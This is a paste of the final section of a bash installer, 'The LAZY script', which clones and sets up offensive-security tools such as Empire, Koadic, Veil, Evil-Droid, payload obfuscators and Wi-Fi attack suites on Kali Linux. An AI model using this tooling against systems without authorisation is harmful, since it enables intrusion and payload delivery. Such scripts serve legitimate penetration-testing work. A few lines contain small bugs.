  9416. echo -e "Installing eaphammer"
  9417. echo -e "Tool by s0lst1c3"
  9418. git clone https://github.com/s0lst1c3/eaphammer
  9419. cd eaphammer
  9420. chmod +x kali-setup
  9421. ./kali-setup
  9422. cd
  9423. clear
  9424. apt-get install -y python-tqdm
  9425. }
  9426. function install_dagon
  9427. {
  9428. if [[ -d /root/dagon ]]
  9429. then
  9430. echo -e "Removing old..."
  9431. echo -e "$PAKTC"
  9432. $READAK
  9433. rm -r /root/dagon
  9434. fi
  9435. cd
  9436. echo -e "Installing Dagon"
  9437. echo -e "Tool by Ekultek"
  9438. git clone https://github.com/ekultek/dagon.git
  9439. cd dagon
  9440. pip install -r requirements.txt
  9441. pip2.7 install -r requirements.txt
  9442. apt-get install -y bcrypt
  9443. cd
  9444. }
  9445. function install_lalin
  9446. {
  9447. if [[ -d /root/LALIN ]]
  9448. then
  9449. echo -e "Removing old..."
  9450. echo -e "$PAKTC"
  9451. $READAK
  9452. rm -r /root/LALIN
  9453. fi
  9454. cd
  9455. echo -e "Installing Lalin"
  9456. echo -e "Tool by Edo -maland-"
  9457. git clone https://github.com/Screetsec/LALIN.git
  9458. cd LALIN
  9459. chmod +x Lalin.sh
  9460. cd
  9461. }
  9462. function install_knockmail
  9463. {
  9464. if [[ -d /root/KnockMail ]]
  9465. then
  9466. echo -e "Removing old..."
  9467. echo -e "$PAKTC"
  9468. $READAK
  9469. rm -r /root/KnockMail
  9470. fi
  9471. cd
  9472. echo -e "Installing KnockMail"
  9473. echo -e "Tool by 4w4k3"
  9474. git clone https://github.com/4w4k3/KnockMail.git
  9475. cd KnockMail
  9476. pip install -r requeriments.txt
  9477. cd
  9478. }
  9479. function install_kwetza
  9480. {
  9481. if [[ -d /root/kwetza ]]
  9482. then
  9483. echo -e "Removing old..."
  9484. echo -e "$PAKTC"
  9485. $READAK
  9486. rm -r /root/kwetza
  9487. fi
  9488. cd
  9489. echo -e "Installing Kwetza"
  9490. echo -e "Tool by Sensepost"
  9491. https://github.com/sensepost/kwetza.git
  9492. pip install beautifulsoup4
  9493. pip2.7 install beautifulsoup4
  9494. }
  9495. function install_ngrok
  9496. {
  9497. if [[ -f /root/ngrok || -f /root/ngrok.zip ]]
  9498. then
  9499. echo -e "Removing old..."
  9500. echo -e "$PAKTC"
  9501. $READAK
  9502. rm -f /root/ngrok
  9503. rm -f /root/ngrok.zip
  9504. fi
  9505. rm -f /root/ngrok.zip
  9506. cd
  9507. echo -e "Downloading Ngrok"
  9508. wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip --output-document=/root/ngrok.zip
  9509. echo -e "Unzipping Ngrok"
  9510. unzip /root/ngrok.zip
  9511. }
  9512. function install_netdiscover
  9513. {
  9514. apt-get install -y netdiscover
  9515. }
  9516. function install_websploit
  9517. {
  9518. apt-get install -y websploit
  9519. }
  9520. function install_openvas
  9521. {
  9522. apt-get install -y openvas
  9523. openvas-setup
  9524. }
  9525. function install_shellter
  9526. {
  9527. apt-get install -y shellter
  9528. sleep 2
  9529. }
  9530. function install_geany
  9531. {
  9532. apt-get install -y geany
  9533. }
  9534. function install_bleachbit
  9535. {
  9536. apt-get install -y bleachbit
  9537. }
  9538. function install_vmr
  9539. {
  9540. if [[ -d /root/mdk3-v6 || -d /root/VMR ]]
  9541. then
  9542. echo -e "Removing old..."
  9543. echo -e "$PAKTC"
  9544. $READAK
  9545. rm -r /root/mdk3-v6
  9546. if [[ -f /root/VMR-MDK-K2-2017R-012x2.zip ]]
  9547. then
  9548. rm /root/VMR-MDK-K2-2017R-012x2.zip
  9549. fi
  9550. if [[ -d /root/VMR ]]
  9551. then
  9552. rm -r /root/VMR
  9553. fi
  9554. fi
  9555. cd
  9556. wget https://github.com/musket33/VMR-MDK-Kali2-Kali2016/raw/master/VMR-MDK-K2-2017R-012x2.zip
  9557. unzip /root/VMR-MDK-K2-2017R-012x2.zip -d /root/VMR
  9558. cp -r /root/VMR/mdk3-v6 /root/
  9559. cd /root/mdk3-v6
  9560. make
  9561. make install
  9562. chmod 755 /root/mdk3-v6/*
  9563. chmod +x /root/VMR/*.sh
  9564. cd
  9565. }
  9566. function install_hashbuster
  9567. {
  9568. if [[ -d /root/Hash-Buster ]]
  9569. then
  9570. echo -e "Removing old..."
  9571. echo -e "$PAKTC"
  9572. $READAK
  9573. rm -r /root/Hash-Buster
  9574. fi
  9575. cd
  9576. git clone https://github.com/UltimateHackers/Hash-Buster.git
  9577.  
  9578. }
  9579. function install_findsploit
  9580. {
  9581. if [[ -d /root/Findsploit ]]
  9582. then
  9583. echo -e "Removing old..."
  9584. echo -e "$PAKTC"
  9585. $READAK
  9586. rm -r /root/Findsploit
  9587. fi
  9588. cd
  9589. git clone https://github.com/1N3/Findsploit.git
  9590. cd /root/Findsploit
  9591. chmod +x install.sh
  9592. ./install.sh
  9593. cd
  9594. }
  9595. function install_howdoi
  9596. {
  9597. pip install howdoi
  9598. pip2.7 install howdoi
  9599. }
  9600. function install_operative
  9601. {
  9602. if [[ -d /root/operative-framework ]]
  9603. then
  9604. echo -e "Removing old..."
  9605. echo -e "$PAKTC"
  9606. $READAK
  9607. rm -r /root/oparative-framework
  9608. fi
  9609. cd
  9610. git clone https://github.com/graniet/operative-framework.git
  9611. cd /root/operative-framework
  9612. pip install -r requirements.txt
  9613. pip2.7 install -r requirements.txt
  9614. }
  9615. function install_netattack2
  9616. {
  9617. if [[ -d "/root/netattack2" ]]
  9618. then
  9619. echo -e "Removing old..."
  9620. echo -e "$PAKTC"
  9621. $READAK
  9622. rm -r /root/netattack2
  9623. fi
  9624. cd
  9625. git clone https://github.com/chrizator/netattack2.git
  9626. }
  9627. function install_koadic
  9628. {
  9629. foldname="koadic"
  9630. gitlink="https://github.com/zerosum0x0/koadic.git"
  9631. if [[ "$foldname" = "" ]]
  9632. then
  9633. exit
  9634. fi
  9635. if [[ -d "/root/"$foldname"" ]]
  9636. then
  9637. echo -e "Removing old..."
  9638. echo -e "$PAKTC"
  9639. $READAK
  9640. rm -r /root/"$foldname"
  9641. fi
  9642. cd
  9643. git clone $gitlink
  9644. cd /root/$foldname
  9645. pip install -r requirements.txt
  9646. pip2.7 install -r requirements.txt
  9647. cd
  9648. }
  9649. function install_empire
  9650. {
  9651. foldname="Empire"
  9652. gitlink="https://github.com/EmpireProject/Empire.git"
  9653. if [[ "$foldname" = "" ]]
  9654. then
  9655. exit
  9656. fi
  9657. if [[ -d "/root/"$foldname"" ]]
  9658. then
  9659. echo -e "Removing old..."
  9660. echo -e "$PAKTC"
  9661. $READAK
  9662. rm -r /root/"$foldname"
  9663. fi
  9664. cd
  9665. git clone $gitlink
  9666. cd /root/$foldname
  9667. chmod +x setup/install.sh
  9668. cd setup
  9669. ./install.sh
  9670. ./setup_database.py
  9671. }
  9672. function install_meterpreter_paranoid_mode
  9673. {
  9674. foldname="Meterpreter_Paranoid_Mode-SSL"
  9675. gitlink="https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git"
  9676. if [[ "$foldname" = "" ]]
  9677. then
  9678. exit
  9679. fi
  9680. if [[ -d "/root/"$foldname"" ]]
  9681. then
  9682. echo -e "Removing old..."
  9683. echo -e "$PAKTC"
  9684. $READAK
  9685. rm -r /root/"$foldname"
  9686. fi
  9687. cd
  9688. git clone $gitlink
  9689. }
  9690. function install_dropit_frmw
  9691. {
  9692. foldname="Dr0p1t-Framework"
  9693. gitlink="https://github.com/D4Vinci/Dr0p1t-Framework.git"
  9694. if [[ "$foldname" = "" ]]
  9695. then
  9696. exit
  9697. fi
  9698. if [[ -d "/root/"$foldname"" ]]
  9699. then
  9700. echo -e "Removing old..."
  9701. echo -e "$PAKTC"
  9702. $READAK
  9703. rm -r /root/"$foldname"
  9704. fi
  9705. cd
  9706. git clone $gitlink
  9707. chmod 777 -R Dr0p1t-Framework
  9708. cd Dr0p1t-Framework
  9709. chmod +x install.sh
  9710. ./install.sh
  9711. #python Dr0p1t.py
  9712. }
  9713. function install_wifi_pumpkin
  9714. {
  9715. foldname="WiFi-Pumpkin"
  9716. gitlink="https://github.com/P0cL4bs/WiFi-Pumpkin.git"
  9717. if [[ "$foldname" = "" ]]
  9718. then
  9719. exit
  9720. fi
  9721. if [[ -d "/root/"$foldname"" ]]
  9722. then
  9723. echo -e "Removing old..."
  9724. echo -e "$PAKTC"
  9725. $READAK
  9726. rm -r /root/"$foldname"
  9727. fi
  9728. cd
  9729. git clone $gitlink
  9730. cd /root/$foldname
  9731. ./installer.sh --install
  9732. }
  9733. function install_veil
  9734. {
  9735. foldname="Veil"
  9736. gitlink="https://github.com/Veil-Framework/Veil.git"
  9737. if [[ "$foldname" = "" ]]
  9738. then
  9739. exit
  9740. fi
  9741. if [[ -d "/root/"$foldname"" ]]
  9742. then
  9743. echo -e "Removing old..."
  9744. echo -e "$PAKTC"
  9745. $READAK
  9746. rm -r /root/"$foldname"
  9747. fi
  9748. cd
  9749. git clone $gitlink
  9750. cd /root/$foldname
  9751. cd setup
  9752. ./setup.sh -c
  9753. cd
  9754. }
  9755. function install_leviathan
  9756. {
  9757. foldname="leviathan"
  9758. gitlink="https://github.com/leviathan-framework/leviathan.git"
  9759. if [[ "$foldname" = "" ]]
  9760. then
  9761. exit
  9762. fi
  9763. if [[ -d "/root/"$foldname"" ]]
  9764. then
  9765. echo -e "Removing old..."
  9766. echo -e "$PAKTC"
  9767. $READAK
  9768. rm -r /root/"$foldname"
  9769. fi
  9770. cd
  9771. git clone $gitlink
  9772. cd /root/$foldname
  9773. pip install -r requirements
  9774.  
  9775. pip2.7 install -r requirements
  9776. cd
  9777. }
  9778. function install_fake_image
  9779. {
  9780. foldname="FakeImageExploiter"
  9781. gitlink="https://github.com/r00t-3xp10it/FakeImageExploiter.git"
  9782. if [[ "$foldname" = "" ]]
  9783. then
  9784. exit
  9785. fi
  9786. if [[ -d "/root/"$foldname"" ]]
  9787. then
  9788. echo -e "Removing old..."
  9789. echo -e "$PAKTC"
  9790. $READAK
  9791. rm -r /root/"$foldname"
  9792. fi
  9793. cd
  9794. git clone $gitlink
  9795. cd /root/$foldname
  9796. chmod +x *.sh
  9797. }
  9798. function install_avet
  9799. {
  9800. foldname="avet"
  9801. gitlink="https://github.com/govolution/avet.git"
  9802. if [[ "$foldname" = "" ]]
  9803. then
  9804. exit
  9805. fi
  9806. if [[ -d "/root/"$foldname"" ]]
  9807. then
  9808. echo -e "Removing old..."
  9809. echo -e "$PAKTC"
  9810. $READAK
  9811. rm -r /root/"$foldname"
  9812. fi
  9813. cd
  9814. git clone $gitlink
  9815. cd /root/$foldname
  9816. }
  9817. function install_gloom
  9818. {
  9819. foldname="Gloom-Framework"
  9820. gitlink="https://github.com/joshDelta/Gloom-Framework.git"
  9821. if [[ "$foldname" = "" ]]
  9822. then
  9823. exit
  9824. fi
  9825. if [[ -d "/root/"$foldname"" ]]
  9826. then
  9827. echo -e "Removing old..."
  9828. echo -e "$PAKTC"
  9829. $READAK
  9830. rm -r /root/"$foldname"
  9831. fi
  9832. cd
  9833. git clone $gitlink
  9834. cd $foldname
  9835. python install.py
  9836. }
  9837. function install_arcanus
  9838. {
  9839. foldname="ARCANUS"
  9840. gitlink="https://github.com/EgeBalci/ARCANUS.git"
  9841. if [[ "$foldname" = "" ]]
  9842. then
  9843. exit
  9844. fi
  9845. if [[ -d "/root/"$foldname"" ]]
  9846. then
  9847. echo -e "Removing old..."
  9848. echo -e "$PAKTC"
  9849. $READAK
  9850. rm -r /root/"$foldname"
  9851. fi
  9852. cd
  9853. git clone $gitlink
  9854. #~ cd $foldname
  9855. }
  9856. function install_msfpc
  9857. {
  9858. apt-get install -y msfpc
  9859. }
  9860. function install_morphhta
  9861. {
  9862. foldname="morphHTA"
  9863. gitlink="https://github.com/vysec/morphHTA.git"
  9864. if [[ "$foldname" = "" ]]
  9865. then
  9866. exit
  9867. fi
  9868. if [[ -d "/root/"$foldname"" ]]
  9869. then
  9870. echo -e "Removing old..."
  9871. echo -e "$PAKTC"
  9872. $READAK
  9873. rm -r /root/"$foldname"
  9874. fi
  9875. cd
  9876. git clone $gitlink
  9877. }
  9878. function install_lfi
  9879. {
  9880. foldname="LFISuite"
  9881. gitlink="https://github.com/D35m0nd142/LFISuite.git"
  9882. if [[ "$foldname" = "" ]]
  9883. then
  9884. exit
  9885. fi
  9886. if [[ -d "/root/"$foldname"" ]]
  9887. then
  9888. echo -e "Removing old..."
  9889. echo -e "$PAKTC"
  9890. $READAK
  9891. rm -r /root/"$foldname"
  9892. fi
  9893. cd
  9894. git clone $gitlink
  9895. }
  9896. function install_unibyav
  9897. {
  9898. foldname="UniByAv"
  9899. gitlink="https://github.com/Mr-Un1k0d3r/UniByAv.git"
  9900. if [[ "$foldname" = "" ]]
  9901. then
  9902. exit
  9903. fi
  9904. if [[ -d "/root/"$foldname"" ]]
  9905. then
  9906. echo -e "Removing old..."
  9907. echo -e "$PAKTC"
  9908. $READAK
  9909. rm -r /root/"$foldname"
  9910. fi
  9911. cd
  9912. git clone $gitlink
  9913. apt-get install -y mingw-w64
  9914. }
  9915. function install_demiguise
  9916. {
  9917. foldname="demiguise"
  9918. gitlink="https://github.com/nccgroup/demiguise.git"
  9919. if [[ "$foldname" = "" ]]
  9920. then
  9921. exit
  9922. fi
  9923. if [[ -d "/root/"$foldname"" ]]
  9924. then
  9925. echo -e "Removing old..."
  9926. echo -e "$PAKTC"
  9927. $READAK
  9928. rm -r /root/"$foldname"
  9929. fi
  9930. cd
  9931. git clone $gitlink
  9932. }
  9933. function install_dkmc
  9934. {
  9935. foldname="DKMC"
  9936. gitlink="https://github.com/Mr-Un1k0d3r/DKMC.git"
  9937. if [[ "$foldname" = "" ]]
  9938. then
  9939. exit
  9940. fi
  9941. if [[ -d "/root/"$foldname"" ]]
  9942. then
  9943. echo -e "Removing old..."
  9944. echo -e "$PAKTC"
  9945. $READAK
  9946. rm -r /root/"$foldname"
  9947. fi
  9948. cd
  9949. git clone $gitlink
  9950. }
  9951. function install_sechub
  9952. {
  9953. foldname="secHub"
  9954. gitlink="https://github.com/joshDelta/secHub.git"
  9955. if [[ "$foldname" = "" ]]
  9956. then
  9957. exit
  9958. fi
  9959. if [[ -d "/root/"$foldname"" ]]
  9960. then
  9961. echo -e "Removing old..."
  9962. echo -e "$PAKTC"
  9963. $READAK
  9964. rm -r /root/"$foldname"
  9965. fi
  9966. cd
  9967. git clone $gitlink
  9968. cd $foldname
  9969. python installer.py
  9970. chmod +x /usr/bin/sechub
  9971. }
  9972. function install_beef
  9973. {
  9974. apt-get install beef-xss
  9975. }
  9976. function install_mitmf
  9977. {
  9978. apt-get -y install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
  9979. foldname="MITMf"
  9980. gitlink="https://github.com/byt3bl33d3r/MITMf"
  9981. if [[ "$foldname" = "" ]]
  9982. then
  9983. exit
  9984. fi
  9985. if [[ -d "/root/"$foldname"" ]]
  9986. then
  9987. echo -e "Removing old..."
  9988. echo -e "$PAKTC"
  9989. $READAK
  9990. rm -r /root/"$foldname"
  9991. fi
  9992. cd
  9993. git clone $gitlink
  9994. cd $foldname
  9995. git submodule init
  9996. git submodule update --recursive
  9997. pip install -r requirements.txt
  9998. pip2.7 install -r requirements.txt
  9999. }
  10000. function install_arp_scan
  10001. {
  10002. apt-get -y install arp-scan
  10003. }
  10004. function install_netool
  10005. {
  10006. foldname="opensource"
  10007. gitlink="https://github.com/r00t-3xp10it/netool-toolkit"
  10008. if [[ "$foldname" = "" ]]
  10009. then
  10010. exit
  10011. fi
  10012. if [[ -d "/root/"$foldname"" ]]
  10013. then
  10014. echo -e "Removing old..."
  10015. echo -e "$PAKTC"
  10016. $READAK
  10017. rm -r /root/"$foldname"
  10018. fi
  10019. cd
  10020. git clone $gitlink opensource
  10021. cd $foldname
  10022. chmod +x INSTALL.sh && ./INSTALL.sh
  10023. }
  10024. function install_sqlmap
  10025. {
  10026. apt-get install sqlmap
  10027. }
  10028. function install_patator
  10029. {
  10030. foldname="patator"
  10031. gitlink="https://github.com/lanjelot/patator"
  10032. if [[ "$foldname" = "" ]]
  10033. then
  10034. exit
  10035. fi
  10036. if [[ -d "/root/"$foldname"" ]]
  10037. then
  10038. echo -e "Removing old..."
  10039. echo -e "$PAKTC"
  10040. $READAK
  10041. rm -r /root/"$foldname"
  10042. fi
  10043. cd
  10044. git clone $gitlink
  10045. }
  10046. function install_zeus
  10047. {
  10048. foldname="Zeus-Scanner"
  10049. gitlink="https://github.com/Ekultek/Zeus-Scanner.git"
  10050. if [[ "$foldname" = "" ]]
  10051. then
  10052. exit
  10053. fi
  10054. if [[ -d "/root/"$foldname"" ]]
  10055. then
  10056. echo -e "Removing old..."
  10057. echo -e "$PAKTC"
  10058. $READAK
  10059. rm -r /root/"$foldname"
  10060. fi
  10061. cd
  10062. git clone $gitlink
  10063. cd $foldname
  10064. pip install -r requirements.txt
  10065. pip2.7 install -r requirements.txt
  10066. }
  10067. function install_evil_droid
  10068. {
  10069. foldname="Evil-Droid"
  10070. gitlink="https://github.com/M4sc3r4n0/Evil-Droid.git"
  10071. if [[ "$foldname" = "" ]]
  10072. then
  10073. exit
  10074. fi
  10075. if [[ -d "/root/"$foldname"" ]]
  10076. then
  10077. echo -e "Removing old..."
  10078. echo -e "$PAKTC"
  10079. $READAK
  10080. rm -r /root/"$foldname"
  10081. fi
  10082. cd
  10083. git clone $gitlink
  10084. cd $foldname
  10085. chmod +x evil-droid
  10086. }
  10087. function install_nosqlmap
  10088. {
  10089. foldname="NoSQLMap"
  10090. gitlink="https://github.com/codingo/NoSQLMap.git"
  10091. if [[ "$foldname" = "" ]]
  10092. then
  10093. exit
  10094. fi
  10095. if [[ -d "/root/"$foldname"" ]]
  10096. then
  10097. echo -e "Removing old..."
  10098. echo -e "$PAKTC"
  10099. $READAK
  10100. rm -r /root/"$foldname"
  10101. fi
  10102. cd
  10103. git clone $gitlink
  10104. cd $foldname
  10105. python setup.py install
  10106. }
  10107.  
  10108.  
  10109.  
  10110.  
  10111. #------------------------------------
  10112. ####################################
  10113. defaults_l
  10114. printf '\033]2;The LAZY script\a'
  10115. if [[ "$ONETIMEPERLAUNCH" != "1" ]]
  10116. then
  10117. one_time_per_launch_ks
  10118. fi
  10119. ####################################
  10120. if [[ -f ""$LPATH"/IAGREE.txt" ]]
  10121. then
  10122.  
  10123. if [[ ! -f ""$LPATH"/wlan.txt" ]]
  10124. then
  10125. set_interface_number
  10126. fi
  10127. if [[ ! -f ""$LPATH"/wlanmon.txt" ]]
  10128. then
  10129. set_interface_number
  10130. fi
  10131. if [[ ! -f ""$LPATH"/eth.txt" ]]
  10132. then
  10133. set_interface_number
  10134. fi
  10135. clear
  10136. WLANNM=$(cat "$LPATH"/wlanmon.txt)
  10137. WLANN=$(cat "$LPATH"/wlan.txt)
  10138. ETH=$(cat "$LPATH"/eth.txt)
  10139. #setting iftop's interface
  10140. if [[ -f "$LPATH"/settings/iftopint.txt ]]
  10141. then
  10142. read iftopint < "$LPATH"/settings/iftopint.txt
  10143. else
  10144. iftopint="$WLANN"
  10145. fi
  10146. export iftopint
  10147. export WLANNM
  10148. export WLANN
  10149. export ETH
  10150. managed_spaces
  10151. monitor_spaces
  10152. if [[ ! -f "$LPATH"/latestchangelog.txt ]]
  10153. then
  10154. echo -e "1" > "$LPATH"/latestchangelog.txt
  10155. latest_changelog
  10156. fi
  10157. banner
  10158. main_options
  10159. if [[ "$BACKL" = "1" ]]
  10160. then
  10161. exec bash "$0"
  10162.  
  10163. else
  10164. echo -e "$PAKTGB"
  10165. $READAK
  10166. exec bash "$0"
  10167. fi
  10168. else
  10169. terms_of_use by Taki
  10170. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement